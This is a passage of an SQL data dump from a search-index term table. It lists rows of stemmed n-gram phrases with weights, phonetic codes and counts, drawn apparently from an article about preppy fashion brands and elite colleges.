and','amount and',0,1,1.3667,'A53253',1,'en'),(37728,'amounts and countless','amount and countless',0,1,1.7,'A5325325342',1,'en'),(37729,'an amount','an amount',0,1,1.3,'A530',1,'en'),(37730,'an amount of','an amount of',0,1,1.4,'A531',1,'en'),(37731,'an issue','an issue',0,1,1.2667,'A520',1,'en'),(37732,'an issue that','an issue that',0,1,1.4333,'A523',1,'en'),(37733,'and a top','and a top',0,1,1.3,'A531',1,'en'),(37734,'and certain','and certain',0,1,1.3667,'A532635',1,'en'),(37735,'and certain fashions','and certain fashions',0,1,1.6667,'A5326351252',1,'en'),(37736,'and charge','and charge',0,1,1.3333,'A53262',1,'en'),(37737,'and charge but','and charge but',0,1,1.4667,'A5326213',1,'en'),(37738,'and coach','and coach',0,1,1.3,'A532',1,'en'),(37739,'and coach might','and coach might',0,1,1.5,'A532523',1,'en'),(37740,'and colleges','and colleges',0,1,1.4,'A53242',1,'en'),(37741,'and colleges it','and colleges it',0,1,1.5,'A532423',1,'en'),(37742,'and countless','and countless',0,1,1.4333,'A5325342',1,'en'),(37743,'and countless jobs','and countless jobs',0,1,1.6,'A532534212',1,'en'),(37744,'and diamond','and diamond',0,1,1.3667,'A5353',1,'en'),(37745,'and diamond pattern','and diamond pattern',0,1,1.6333,'A53531365',1,'en'),(37746,'and ethnic','and ethnic',0,1,1.3333,'A5352',1,'en'),(37747,'and ethnic beginnings','and ethnic beginnings',0,1,1.7,'A53521252',1,'en'),(37748,'and got','and got',0,1,1.2333,'A5323',1,'en'),(37749,'and got straight','and got straight',0,1,1.5333,'A532323623',1,'en'),(37750,'and have','and have',0,1,1.2667,'A531',1,'en'),(37751,'and have and','and have and',0,1,1.4,'A53153',1,'en'),(37752,'and hollister','and hollister',0,1,1.4333,'A534236',1,'en'),(37753,'and hollister thing','and hollister thing',0,1,1.6333,'A534236352',1,'en'),(37754,'and hollister view','and hollister view',0,1,1.6,'A5342361',1,'en'),(37755,'and is actually','and is actually',0,1,1.5,'A53234',1,'en'),(37756,'and is marked','and is marked',0,1,1.4333,'A5325623',1,'en'),(37757,'and meanings','and meanings',0,1,1.4,'A5352',1,'en'),(37758,'and meanings changes','and meanings changes',0,1,1.6667,'A535252',1,'en'),(37759,'and not homosexual','and not homosexual',0,1,1.6,'A5353524',1,'en'),(37760,'and riches','and riches',0,1,1.3333,'A5362',1,'en'),(37761,'and riches the','and riches the',0,1,1.4667,'A53623',1,'en'),(37762,'and sandals','and sandals',0,1,1.3667,'A5325342',1,'en'),(37763,'and sandals revise','and sandals revise',0,1,1.6,'A5325342612',1,'en'),(37764,'and sentira','and sentira',0,1,1.3667,'A532536',1,'en'),(37765,'and sentira bradely','and sentira bradely',0,1,1.6333,'A5325361634',1,'en'),(37766,'and so','and so',0,1,1.2,'A532',1,'en'),(37767,'and so it','and so it',0,1,1.3,'A5323',1,'en'),(37768,'and then cerulean','and then cerulean',0,1,1.5667,'A5352645',1,'en'),(37769,'and then it','and then it',0,1,1.3667,'A5353',1,'en'),(37770,'and then trickled','and then trickled',0,1,1.5667,'A53536243',1,'en'),(37771,'and tiring','and tiring',0,1,1.3333,'A53652',1,'en'),(37772,'and tiring nice','and tiring nice',0,1,1.5,'A5365252',1,'en'),(37773,'and turned','and turned',0,1,1.3333,'A53653',1,'en'),(37774,'and turned it','and turned it',0,1,1.4333,'A53653',1,'en'),(37775,'and will be','and will be',0,1,1.3667,'A5341',1,'en'),(37776,'and you decide','and you decide',0,1,1.4667,'A5323',1,'en'),(37777,'any longer','ani longer',0,1,1.3333,'A54526',1,'en'),(37778,'any longer glorify','ani longer glorify',0,1,1.6,'A545262461',1,'en'),(37779,'any thing','ani thing',0,1,1.3,'A5352',1,'en'),(37780,'any thing in','ani thing in',0,1,1.4,'A53525',1,'en'),(37781,'any urban','ani urban',0,1,1.3,'A5615',1,'en'),(37782,'any urban area','ani urban area',0,1,1.4667,'A56156',1,'en'),(37783,'anyhow','anyhow',0,0,0.4,'A500',1,'en'),(37784,'anyhow that','anyhow that',0,1,1.3667,'A530',1,'en'),(37785,'anyhow that blue','anyhow that blue',0,1,1.5333,'A5314',1,'en'),(37786,'anyone','anyon',0,0,0.4,'A500',2,'en'),(37787,'anyone kept','anyon kept',0,1,1.3667,'A5213',1,'en'),(37788,'anyone kept on','anyon kept on',0,1,1.4667,'A52135',1,'en'),(37789,'appears better','appear better',0,1,1.4667,'A162136',1,'en'),(37790,'appears better for','appear better for',0,1,1.6,'A16213616',1,'en'),(37791,'appears likewise','appear likewise',0,1,1.5333,'A16242',1,'en'),(37792,'appears likewise as','appear likewise as',0,1,1.6333,'A16242',1,'en'),(37793,'aqua','aqua',0,0,0.2667,'A200',1,'en'),(37794,'aqua blue','aqua blue',0,1,1.3,'A214',1,'en'),(37795,'aqua blue it','aqua blue it',0,1,1.4,'A2143',1,'en'),(37796,'are copycats','ar copycats',0,1,1.4,'A621232',1,'en'),(37797,'are copycats on','ar copycats on',0,1,1.5,'A6212325',1,'en'),(37798,'are people','ar people',0,1,1.3333,'A614',2,'en'),(37799,'are people who','ar people who',0,1,1.4667,'A614',2,'en'),(37800,'are preppy','ar preppy',0,1,1.3333,'A6161',1,'en'),(37801,'are preppy rory','ar preppy rory',0,1,1.5,'A61616',1,'en'),(37802,'area no','area no',0,1,1.2333,'A650',1,'en'),(37803,'area no matter','area no matter',0,1,1.4667,'A6536',1,'en'),(37804,'area were','area were',0,1,1.3,'A600',1,'en'),(37805,'area were people','area were people',0,1,1.5333,'A614',1,'en'),(37806,'army','armi',0,0,0.2667,'A650',1,'en'),(37807,'army jackets','armi jackets',0,1,1.4,'A65232',1,'en'),(37808,'army jackets and','armi jackets and',0,1,1.5333,'A6523253',1,'en'),(37809,'around you','around you',0,1,1.3333,'A653',1,'en'),(37810,'around you that','around you that',0,1,1.5,'A653',1,'en'),(37811,'around your','around your',0,1,1.3667,'A6536',2,'en'),(37812,'around your neck','around your neck',0,1,1.5333,'A653652',2,'en'),(37813,'arriving','arriv',0,0,0.5333,'A6152',1,'en'),(37814,'arriving at','arriv at',0,1,1.3667,'A61523',1,'en'),(37815,'arriving at they','arriv at they',0,1,1.5333,'A61523',1,'en'),(37816,'as abercrombie','as abercrombie',0,1,1.4667,'A2162651',1,'en'),(37817,'as abercrombie and','as abercrombie and',0,1,1.6,'A216265153',1,'en'),(37818,'as getting','as getting',0,1,1.3333,'A2352',1,'en'),(37819,'as getting hanes','as getting hanes',0,1,1.5333,'A235252',1,'en'),(37820,'as i','as i',0,1,1.1333,'A200',2,'en'),(37821,'as i calm','as i calm',0,1,1.3,'A245',1,'en'),(37822,'as long','as long',0,1,1.2333,'A2452',1,'en'),(37823,'as long as','as long as',0,1,1.3333,'A2452',1,'en'),(37824,'as opposed','as opposed',0,1,1.3333,'A2123',2,'en'),(37825,'as opposed to','as opposed to',0,1,1.4333,'A2123',2,'en'),(37826,'as over','as over',0,1,1.2333,'A216',1,'en'),(37827,'as over priced','as over priced',0,1,1.4667,'A2161623',1,'en'),(37828,'at they','at they',0,1,1.2333,'A300',1,'en'),(37829,'at they have','at they have',0,1,1.4,'A310',1,'en'),(37830,'at you','at you',0,1,1.2,'A300',1,'en'),(37831,'at you think','at you think',0,1,1.4,'A352',1,'en'),(37832,'athleticism','athletic',0,0,0.7333,'A34325',1,'en'),(37833,'athleticism sociability','athletic sociability',0,1,1.7667,'A343252143',1,'en'),(37834,'athleticism sociability and','athletic sociability and',0,1,1.9,'A34325214353',1,'en'),(37835,'attended','attend',0,0,0.5333,'A353',1,'en'),(37836,'attended elite','attend elite',0,1,1.4667,'A35343',1,'en'),(37837,'attended elite college','attend elite college',0,1,1.7333,'A35343242',1,'en'),(37838,'attended however','attend however',0,1,1.5333,'A35316',1,'en'),(37839,'attended however substantial','attend however substantial',0,1,1.9333,'A353162123534',1,'en'),(37840,'attended is','attend is',0,1,1.3667,'A3532',1,'en'),(37841,'attended is sometimes','attend is sometimes',0,1,1.7,'A35325352',1,'en'),(37842,'back but','back but',0,1,1.2667,'B213',1,'en'),(37843,'back but what','back but what',0,1,1.4333,'B213',1,'en'),(37844,'background live','background live',0,1,1.5,'B265341',1,'en'),(37845,'background live then','background live then',0,1,1.6667,'B26534135',1,'en'),(37846,'backgrounds','background',0,0,0.7333,'B26532',1,'en'),(37847,'backgrounds more','background more',0,1,1.5333,'B2653256',1,'en'),(37848,'backgrounds more mostly','background more mostly',0,1,1.7667,'B26532565234',1,'en'),(37849,'bad and','bad and',0,1,1.2333,'B353',1,'en'),(37850,'bad and charge','bad and charge',0,1,1.4667,'B353262',1,'en'),(37851,'basic schools','basic schools',0,1,1.4333,'B242',1,'en'),(37852,'basic schools often','basic schools often',0,1,1.6333,'B242135',1,'en'),(37853,'be elitist','be elitist',0,1,1.3333,'B4323',1,'en'),(37854,'be elitist see','be elitist see',0,1,1.4667,'B43232',1,'en'),(37855,'be meant','be meant',0,1,1.2667,'B530',1,'en'),(37856,'be meant to','be meant to',0,1,1.3667,'B530',1,'en'),(37857,'because it','becaus it',0,1,1.3333,'B230',1,'en'),(37858,'because it excludes','becaus it excludes',0,1,1.6333,'B232432',1,'en'),(37859,'because you','becaus you',0,1,1.3667,'B200',1,'en'),(37860,'because you trying','becaus you trying',0,1,1.6,'B23652',1,'en'),(37861,'bedding','bed',0,0,0.4667,'B352',1,'en'),(37862,'bedding items','bed items',0,1,1.4333,'B352352',1,'en'),(37863,'bedding items manner','bed items manner',0,1,1.6667,'B35235256',1,'en'),(37864,'been to','been to',0,1,1.2333,'B530',1,'en'),(37865,'been to the','been to the',0,1,1.3667,'B530',1,'en'),(37866,'before denote','befor denote',0,1,1.4333,'B6353',1,'en'),(37867,'before denote wealthy','befor denote wealthy',0,1,1.7,'B635343',1,'en'),(37868,'beginnings','begin',0,0,0.6667,'B252',1,'en'),(37869,'beginnings essentially','begin essentially',0,1,1.7333,'B252534',1,'en'),(37870,'beginnings essentially it','begin essentially it',0,1,1.8333,'B2525343',1,'en'),(37871,'better for','better for',0,1,1.3333,'B3616',1,'en'),(37872,'better for me','better for me',0,1,1.4333,'B36165',1,'en'),(37873,'better scale','better scale',0,1,1.4,'B3624',1,'en'),(37874,'better scale then','better scale then',0,1,1.5667,'B362435',1,'en'),(37875,'bin','bin',0,0,0.2,'B500',1,'en'),(37876,'bin anyhow','bin anyhow',0,1,1.3333,'B500',1,'en'),(37877,'bin anyhow that','bin anyhow that',0,1,1.5,'B530',1,'en'),(37878,'blithely','blith',0,0,0.5333,'B434',1,'en'),(37879,'blithely unaware','blith unaware',0,1,1.5333,'B43456',1,'en'),(37880,'blithely unaware that','blith unaware that',0,1,1.7,'B434563',1,'en'),(37881,'blue','blue',0,0,0.2667,'B400',3,'en'),(37882,'blue dress','blue dress',0,1,1.3333,'B4362',1,'en'),(37883,'blue dress including','blue dress including',0,1,1.6667,'B4362524352',1,'en'),(37884,'blue it','blue it',0,1,1.2333,'B430',1,'en'),(37885,'blue it as','blue it as',0,1,1.3333,'B432',1,'en'),(37886,'blue it not','blue it not',0,1,1.3667,'B4353',1,'en'),(37887,'blue represents','blue represents',0,1,1.5,'B46162532',1,'en'),(37888,'blue represents vast','blue represents vast',0,1,1.6667,'B46162532123',1,'en'),(37889,'boarding','board',0,0,0.5333,'B6352',1,'en'),(37890,'boarding educational','board educational',0,1,1.6667,'B635232354',1,'en'),(37891,'boarding educational institutions','board educational institutions',0,1,2,'B63523235452352',1,'en'),(37892,'bradely','brade',0,0,0.4667,'B634',1,'en'),(37893,'bradely to','brade to',0,1,1.3333,'B6343',1,'en'),(37894,'bradely to polo','brade to polo',0,1,1.5,'B634314',1,'en'),(37895,'business and','busi and',0,1,1.4,'B25253',1,'en'),(37896,'business and certain','busi and certain',0,1,1.6667,'B252532635',1,'en'),(37897,'business status','busi status',0,1,1.5,'B25232',1,'en'),(37898,'business status and','busi status and',0,1,1.6333,'B2523253',1,'en'),(37899,'but appears','but appears',0,1,1.3667,'B3162',1,'en'),(37900,'but appears better','but appears better',0,1,1.6,'B3162136',1,'en'),(37901,'but what','but what',0,1,1.2667,'B300',1,'en'),(37902,'but what you','but what you',0,1,1.4,'B300',1,'en'),(37903,'but your right','but your right',0,1,1.4667,'B3623',1,'en'),(37904,'by controversy','by controversy',0,1,1.4667,'B2536162',1,'en'),(37905,'by controversy because','by controversy because',0,1,1.7333,'B253616212',1,'en'),(37906,'call in','call in',0,1,1.2333,'C450',1,'en'),(37907,'call in your','call in your',0,1,1.4,'C456',1,'en'),(37908,'calm','calm',0,0,0.2667,'C450',1,'en'),(37909,'calm well','calm well',0,1,1.3,'C454',1,'en'),(37910,'calm well let','calm well let',0,1,1.4333,'C4543',1,'en'),(37911,'can be elitist','can be elitist',0,1,1.4667,'C514323',1,'en'),(37912,'can emerge','can emerge',0,1,1.3333,'C562',1,'en'),(37913,'can emerge from','can emerge from',0,1,1.5,'C562165',1,'en'),(37914,'can preppy','can preppy',0,1,1.3333,'C5161',1,'en'),(37915,'can preppy anyone','can preppy anyone',0,1,1.5667,'C51615',1,'en'),(37916,'care about','care about',0,1,1.3333,'C613',1,'en'),(37917,'care about what','care about what',0,1,1.5,'C613',1,'en'),(37918,'case','case',0,0,0.2667,'C000',2,'en'),(37919,'case you','case you',0,1,1.2667,'C000',1,'en'),(37920,'case you says','case you says',0,1,1.4333,'C000',1,'en'),(37921,'casual','casual',0,0,0.4,'C400',1,'en'),(37922,'casual corner','casual corner',0,1,1.4333,'C42656',1,'en'),(37923,'casual corner where','casual corner where',0,1,1.6333,'C42656',1,'en'),(37924,'certain background','certain background',0,1,1.6,'C63512653',1,'en'),(37925,'certain background live','certain background live',0,1,1.7667,'C6351265341',1,'en'),(37926,'certain class','certain class',0,1,1.4333,'C635242',1,'en'),(37927,'certain class business','certain class business',0,1,1.7333,'C6352421252',1,'en'),(37928,'certain fashions','certain fashions',0,1,1.5333,'C6351252',1,'en'),(37929,'certain fashions have','certain fashions have',0,1,1.7,'C63512521',1,'en'),(37930,'cerulean','cerulean',0,0,0.5333,'C645',1,'en'),(37931,'cerulean army','cerulean army',0,1,1.4333,'C64565',1,'en'),(37932,'cerulean army jackets','cerulean army jackets',0,1,1.7,'C64565232',1,'en'),(37933,'cerulean gowns','cerulean gowns',0,1,1.4667,'C645252',1,'en'),(37934,'cerulean gowns and','cerulean gowns and',0,1,1.6,'C64525253',1,'en'),(37935,'cerulean quickly','cerulean quickly',0,1,1.5333,'C64524',1,'en'),(37936,'cerulean quickly showed','cerulean quickly showed',0,1,1.7667,'C6452423',1,'en'),(37937,'cerulean you','cerulean you',0,1,1.4,'C645',1,'en'),(37938,'cerulean you also','cerulean you also',0,1,1.5667,'C64542',1,'en'),(37939,'changes in','chang in',0,1,1.3333,'C525',1,'en'),(37940,'changes in time','chang in time',0,1,1.5,'C52535',1,'en'),(37941,'changing','chang',0,0,0.5333,'C5252',2,'en'),(37942,'changing the','chang the',0,1,1.4,'C52523',2,'en'),(37943,'changing the term','chang the term',0,1,1.5667,'C5252365',1,'en'),(37944,'charge but','charg but',0,1,1.3333,'C6213',1,'en'),(37945,'charge but your','charg but your',0,1,1.5,'C62136',1,'en'),(37946,'choice that','choic that',0,1,1.3667,'C300',1,'en'),(37947,'choice that exempts','choic that exempts',0,1,1.6333,'C325132',1,'en'),(37948,'class business','class business',0,1,1.4667,'C421252',1,'en'),(37949,'class business status','class business status',0,1,1.7,'C42125232',1,'en'),(37950,'classy','classi',0,0,0.4,'C420',1,'en'),(37951,'classy wealthy','classi wealthy',0,1,1.4667,'C4243',1,'en'),(37952,'classy wealthy families','classi wealthy families',0,1,1.7667,'C42431542',1,'en'),(37953,'cleverness','clever',0,0,0.6667,'C41652',1,'en'),(37954,'cleverness athleticism','clever athleticism',0,1,1.7333,'C4165234325',1,'en'),(37955,'cleverness athleticism sociability','clever athleticism sociability',0,1,2,'C41652343252143',1,'en'),(37956,'closet','closet',0,0,0.4,'C423',1,'en'),(37957,'closet and','closet and',0,1,1.3333,'C42353',1,'en'),(37958,'closet and you','closet and you',0,1,1.4667,'C42353',1,'en'),(37959,'clothes abercrombie','cloth abercrombie',0,1,1.6333,'C432162651',1,'en'),(37960,'clothes abercrombie hollister','cloth abercrombie hollister',0,1,1.9667,'C4321626514236',1,'en'),(37961,'co uk 2','co uk 2',0,1,1.2333,'C000',1,'en'),(37962,'coach','coach',0,0,0.3333,'C000',1,'en'),(37963,'coach might','coach might',0,1,1.3667,'C523',1,'en'),(37964,'coach might as','coach might as',0,1,1.4667,'C5232',1,'en'),(37965,'college','colleg',0,0,0.4667,'C420',3,'en'),(37966,'college basic','colleg basic',0,1,1.4333,'C4212',1,'en'),(37967,'college basic schools','colleg basic schools',0,1,1.7,'C421242',1,'en'),(37968,'college preppy','colleg preppy',0,1,1.4667,'C42161',1,'en'),(37969,'college preppy culture','colleg preppy culture',0,1,1.7333,'C421612436',1,'en'),(37970,'college this','colleg this',0,1,1.4,'C4232',1,'en'),(37971,'college this is','colleg this is',0,1,1.5,'C4232',1,'en'),(37972,'colleges','colleg',0,0,0.5333,'C420',1,'en'),(37973,'colleges and','colleg and',0,1,1.4,'C4253',1,'en'),(37974,'colleges and tiring','colleg and tiring',0,1,1.6333,'C4253652',1,'en'),(37975,'colleges it','colleg it',0,1,1.3667,'C423',1,'en'),(37976,'colleges it is','colleg it is',0,1,1.4667,'C4232',1,'en'),(37977,'come like','come like',0,1,1.3,'C542',1,'en'),(37978,'come like the','come like the',0,1,1.4333,'C5423',1,'en'),(37979,'come to refer','come to refer',0,1,1.4333,'C53616',1,'en'),(37980,'comical','comic',0,0,0.4667,'C524',1,'en'),(37981,'comical how','comic how',0,1,1.3667,'C524',1,'en'),(37982,'comical how you','comic how you',0,1,1.5,'C524',1,'en'),(37983,'company the','compani the',0,1,1.3667,'C5153',1,'en'),(37984,'company the devil','compani the devil',0,1,1.5667,'C515314',1,'en'),(37985,'concept gay','concept gay',0,1,1.3667,'C52132',1,'en'),(37986,'concept gay just','concept gay just',0,1,1.5333,'C521323',1,'en'),(37987,'concept of','concept of',0,1,1.3333,'C52131',1,'en'),(37988,'concept of what','concept of what',0,1,1.5,'C521313',1,'en'),(37989,'controversy','controversi',0,0,0.7333,'C536162',1,'en'),(37990,'controversy because','controversi because',0,1,1.6333,'C53616212',1,'en'),(37991,'controversy because it','controversi because it',0,1,1.7333,'C536162123',1,'en'),(37992,'copycats','copycat',0,0,0.5333,'C1232',1,'en'),(37993,'copycats on','copycat on',0,1,1.3667,'C12325',1,'en'),(37994,'copycats on exactly','copycat on exactly',0,1,1.6333,'C12325234',1,'en'),(37995,'corner','corner',0,0,0.4,'C656',2,'en'),(37996,'corner where','corner where',0,1,1.4,'C656',1,'en'),(37997,'corner where you','corner where you',0,1,1.5333,'C656',1,'en'),(37998,'cost doesn\'t','cost doesn',0,1,1.4,'C3253',1,'en'),(37999,'cost doesn\'t imply','cost doesn imply',0,1,1.6,'C3253514',1,'en'),(38000,'countless','countless',0,0,0.6,'C5342',1,'en'),(38001,'countless jobs','countless jobs',0,1,1.4667,'C534212',1,'en'),(38002,'countless jobs and','countless jobs and',0,1,1.6,'C53421253',1,'en'),(38003,'culture also','cultur also',0,1,1.4,'C43642',1,'en'),(38004,'culture also highlights','cultur also highlights',0,1,1.7667,'C436424232',1,'en'),(38005,'culture idealizes','cultur idealizes',0,1,1.5667,'C436342',1,'en'),(38006,'culture idealizes history','cultur idealizes history',0,1,1.8333,'C43634236',1,'en'),(38007,'de la','de la',0,1,1.1667,'D400',2,'en'),(38008,'de la renta','de la renta',0,1,1.3667,'D4653',1,'en'),(38009,'decide','decid',0,0,0.4,'D230',1,'en'),(38010,'decide on','decid on',0,1,1.3,'D235',1,'en'),(38011,'decide on out','decid on out',0,1,1.4333,'D2353',1,'en'),(38012,'deference','defer',0,0,0.6,'D1652',1,'en'),(38013,'deference to','defer to',0,1,1.4,'D16523',1,'en'),(38014,'deference to business','defer to business',0,1,1.7,'D165231252',1,'en'),(38015,'degraded','degrad',0,0,0.5333,'D263',1,'en'),(38016,'degraded include','degrad include',0,1,1.5333,'D2635243',1,'en'),(38017,'degraded include things','degrad include things',0,1,1.7667,'D263524352',1,'en'),(38018,'denote','denot',0,0,0.4,'D530',1,'en'),(38019,'denote wealthy','denot wealthy',0,1,1.4667,'D5343',1,'en'),(38020,'denote wealthy families','denot wealthy families',0,1,1.7667,'D53431542',1,'en'),(38021,'describe','describ',0,0,0.5333,'D261',1,'en'),(38022,'describe a','describ a',0,1,1.3333,'D261',1,'en'),(38023,'describe a person','describ a person',0,1,1.5667,'D261625',1,'en'),(38024,'describes','describ',0,0,0.6,'D2612',1,'en'),(38025,'describes teenagers','describ teenagers',0,1,1.6333,'D261235262',1,'en'),(38026,'describes teenagers that','describ teenagers that',0,1,1.8,'D2612352623',1,'en'),(38027,'designers','design',0,0,0.6,'D2562',1,'en'),(38028,'designers then','design then',0,1,1.4667,'D256235',1,'en'),(38029,'designers then it','design then it',0,1,1.5667,'D2562353',1,'en'),(38030,'detail people','detail people',0,1,1.4333,'D414',1,'en'),(38031,'detail people from','detail people from',0,1,1.6,'D414165',1,'en'),(38032,'devil','devil',0,0,0.3333,'D140',1,'en'),(38033,'devil might','devil might',0,1,1.3667,'D14523',1,'en'),(38034,'devil might wear','devil might wear',0,1,1.5333,'D145236',1,'en'),(38035,'diamond','diamond',0,0,0.4667,'D530',1,'en'),(38036,'diamond pattern','diamond pattern',0,1,1.5,'D531365',1,'en'),(38037,'diamond pattern vest','diamond pattern vest',0,1,1.6667,'D531365123',1,'en'),(38038,'did an','did an',0,1,1.2,'D500',1,'en'),(38039,'did an amount','did an amount',0,1,1.4333,'D530',1,'en'),(38040,'different designers','differ designers',0,1,1.6333,'D16532562',1,'en'),(38041,'different designers then','differ designers then',0,1,1.8,'D1653256235',1,'en'),(38042,'do with you','do with you',0,1,1.3667,'D000',1,'en'),(38043,'does now','doe now',0,1,1.2667,'D250',1,'en'),(38044,'does now or','doe now or',0,1,1.3667,'D256',1,'en'),(38045,'doesn\'t imply','doesn imply',0,1,1.4333,'D253514',1,'en'),(38046,'doesn\'t imply that','doesn imply that',0,1,1.6,'D2535143',1,'en'),(38047,'don know','don know',0,1,1.2667,'D525',1,'en'),(38048,'don know is','don know is',0,1,1.3667,'D5252',1,'en'),(38049,'don realize','don realize',0,1,1.3667,'D5642',1,'en'),(38050,'don realize that','don realize that',0,1,1.5333,'D56423',1,'en'),(38051,'down into','down into',0,1,1.3,'D530',1,'en'),(38052,'down into some','down into some',0,1,1.4667,'D5325',1,'en'),(38053,'down through','down through',0,1,1.4,'D5362',1,'en'),(38054,'down through the','down through the',0,1,1.5333,'D53623',1,'en'),(38055,'dress for','dress for',0,1,1.3,'D6216',1,'en'),(38056,'dress for successes','dress for successes',0,1,1.6333,'D62162',1,'en'),(38057,'dress including','dress including',0,1,1.5,'D62524352',1,'en'),(38058,'dress including because','dress including because',0,1,1.7667,'D6252435212',1,'en'),(38059,'due to pile','due to pile',0,1,1.3667,'D140',1,'en'),(38060,'educational','educ',0,0,0.7333,'E32354',1,'en'),(38061,'educational institutions','educ institutions',0,1,1.8,'E3235452352',1,'en'),(38062,'educational institutions strangely','educ institutions strangely',0,1,2,'E323545235236524',1,'en'),(38063,'elite college','elit college',0,1,1.4333,'E43242',1,'en'),(38064,'elite college basic','elit college basic',0,1,1.6333,'E4324212',1,'en'),(38065,'eliteness','elit',0,0,0.6,'E4352',1,'en'),(38066,'eliteness or','elit or',0,1,1.4,'E43526',1,'en'),(38067,'eliteness or cost','elit or cost',0,1,1.5667,'E4352623',1,'en'),(38068,'elitist','elitist',0,0,0.4667,'E4323',1,'en'),(38069,'elitist not','elitist not',0,1,1.3667,'E432353',1,'en'),(38070,'elitist not every','elitist not every',0,1,1.5667,'E43235316',1,'en'),(38071,'elitist see','elitist see',0,1,1.3667,'E43232',1,'en'),(38072,'elitist see the','elitist see the',0,1,1.5,'E432323',1,'en'),(38073,'emerge','emerg',0,0,0.4,'E562',1,'en'),(38074,'emerge from','emerg from',0,1,1.3667,'E562165',1,'en'),(38075,'emerge from the','emerg from the',0,1,1.5,'E5621653',1,'en'),(38076,'enough enough','enough enough',0,1,1.4333,'E5252',1,'en'),(38077,'enough enough the','enough enough the',0,1,1.5667,'E52523',1,'en'),(38078,'enough the','enough the',0,1,1.3333,'E523',1,'en'),(38079,'enough the prep','enough the prep',0,1,1.5,'E523161',1,'en'),(38080,'essentially','essenti',0,0,0.7333,'E2534',1,'en'),(38081,'essentially it','essenti it',0,1,1.4667,'E25343',1,'en'),(38082,'essentially it is','essenti it is',0,1,1.5667,'E253432',1,'en'),(38083,'established wasp','establish wasp',0,1,1.5333,'E23142321',1,'en'),(38084,'established wasp families','establish wasp families',0,1,1.8333,'E23142321542',1,'en'),(38085,'ethnic','ethnic',0,0,0.4,'E352',1,'en'),(38086,'ethnic beginnings','ethnic beginnings',0,1,1.5667,'E3521252',1,'en'),(38087,'ethnic beginnings essentially','ethnic beginnings essentially',0,1,1.9667,'E3521252534',1,'en'),(38088,'every one','everi one',0,1,1.3,'E165',1,'en'),(38089,'every one can','everi one can',0,1,1.4333,'E16525',1,'en'),(38090,'everyone','everyon',0,0,0.5333,'E165',2,'en'),(38091,'everyone around','everyon around',0,1,1.5,'E165653',1,'en'),(38092,'everyone around you','everyon around you',0,1,1.6333,'E165653',1,'en'),(38093,'exactly just','exactli just',0,1,1.4,'E23423',1,'en'),(38094,'exactly just what','exactli just what',0,1,1.5667,'E23423',1,'en'),(38095,'excludes','exclud',0,0,0.5333,'E2432',1,'en'),(38096,'excludes people','exclud people',0,1,1.5,'E243214',1,'en'),(38097,'excludes people from','exclud people from',0,1,1.6667,'E243214165',1,'en'),(38098,'exempts','exempt',0,0,0.4667,'E25132',1,'en'),(38099,'exempts you','exempt you',0,1,1.3667,'E25132',1,'en'),(38100,'exempts you from','exempt you from',0,1,1.5333,'E25132165',1,'en'),(38101,'explain','explain',0,0,0.4667,'E2145',1,'en'),(38102,'explain any','explain any',0,1,1.3667,'E2145',1,'en'),(38103,'explain any urban','explain any urban',0,1,1.5667,'E2145615',1,'en'),(38104,'explain slum','explain slum',0,1,1.4,'E2145245',1,'en'),(38105,'explain slum area','explain slum area',0,1,1.5667,'E21452456',1,'en'),(38106,'fabulous','fabul',0,0,0.5333,'F420',1,'en'),(38107,'fabulous appears','fabul appears',0,1,1.5333,'F42162',1,'en'),(38108,'fabulous appears likewise','fabul appears likewise',0,1,1.8333,'F4216242',1,'en'),(38109,'fabulous some','fabul some',0,1,1.4333,'F425',1,'en'),(38110,'fabulous some positive','fabul some positive',0,1,1.7333,'F4251231',1,'en'),(38111,'families a','famili a',0,1,1.3333,'F542',1,'en'),(38112,'families a new','famili a new',0,1,1.4667,'F5425',1,'en'),(38113,'families and','famili and',0,1,1.4,'F54253',1,'en'),(38114,'families and have','famili and have',0,1,1.5667,'F542531',1,'en'),(38115,'families and is','famili and is',0,1,1.5,'F542532',1,'en'),(38116,'fashion industry','fashion industry',0,1,1.5333,'F253236',1,'en'),(38117,'fashion industry when','fashion industry when',0,1,1.7,'F2532365',1,'en'),(38118,'fashion wasn\'t','fashion wasn',0,1,1.4667,'F25253',1,'en'),(38119,'fashion wasn\'t meant','fashion wasn meant',0,1,1.6667,'F2525353',1,'en'),(38120,'fashions','fashion',0,0,0.5333,'F252',1,'en'),(38121,'fashions have','fashion have',0,1,1.4333,'F2521',1,'en'),(38122,'fashions have you','fashion have you',0,1,1.5667,'F2521',1,'en'),(38123,'filtered','filter',0,0,0.5333,'F4363',1,'en'),(38124,'filtered down','filter down',0,1,1.4333,'F43635',1,'en'),(38125,'filtered down through','filter down through',0,1,1.7,'F43635362',1,'en'),(38126,'fished','fish',0,0,0.4,'F230',1,'en'),(38127,'fished it','fish it',0,1,1.3,'F230',1,'en'),(38128,'fished it out','fish it out',0,1,1.4333,'F230',1,'en'),(38129,'for me','for me',0,1,1.2,'F650',1,'en'),(38130,'for me i','for me i',0,1,1.2667,'F650',1,'en'),(38131,'for successes','for successes',0,1,1.4333,'F620',1,'en'),(38132,'for successes and','for successes and',0,1,1.5667,'F6253',1,'en'),(38133,'for the masses','for the masses',0,1,1.4667,'F6352',1,'en'),(38134,'for you by','for you by',0,1,1.3333,'F610',1,'en'),(38135,'fortunate','fortun',0,0,0.6,'F6353',2,'en'),(38136,'fortunate it','fortun it',0,1,1.4,'F6353',1,'en'),(38137,'fortunate it has','fortun it has',0,1,1.5333,'F63532',1,'en'),(38138,'found my','found my',0,1,1.2667,'F535',1,'en'),(38139,'found my self','found my self',0,1,1.4333,'F535241',1,'en'),(38140,'from established','from established',0,1,1.5333,'F65231423',1,'en'),(38141,'from established wasp','from established wasp',0,1,1.7,'F6523142321',1,'en'),(38142,'from film production','from film production',0,1,1.6667,'F65145163235',1,'en'),(38143,'from other','from other',0,1,1.3333,'F6536',1,'en'),(38144,'from other backgrounds','from other backgrounds',0,1,1.7333,'F6536126532',1,'en'),(38145,'from the fashion','from the fashion',0,1,1.5333,'F653125',1,'en'),(38146,'from the term','from the term',0,1,1.4333,'F65365',1,'en'),(38147,'gay','gai',0,0,0.2,'G000',1,'en'),(38148,'gay just','gai just',0,1,1.2667,'G300',1,'en'),(38149,'gay just a','gai just a',0,1,1.3333,'G300',1,'en'),(38150,'gay use','gai use',0,1,1.2333,'G000',1,'en'),(38151,'gay use to','gai use to',0,1,1.3333,'G300',1,'en'),(38152,'getting hanes','get hanes',0,1,1.4333,'G35252',1,'en'),(38153,'getting hanes with','get hanes with',0,1,1.6,'G352523',1,'en'),(38154,'ghetto','ghetto',0,0,0.4,'G300',1,'en'),(38155,'ghetto ghetto','ghetto 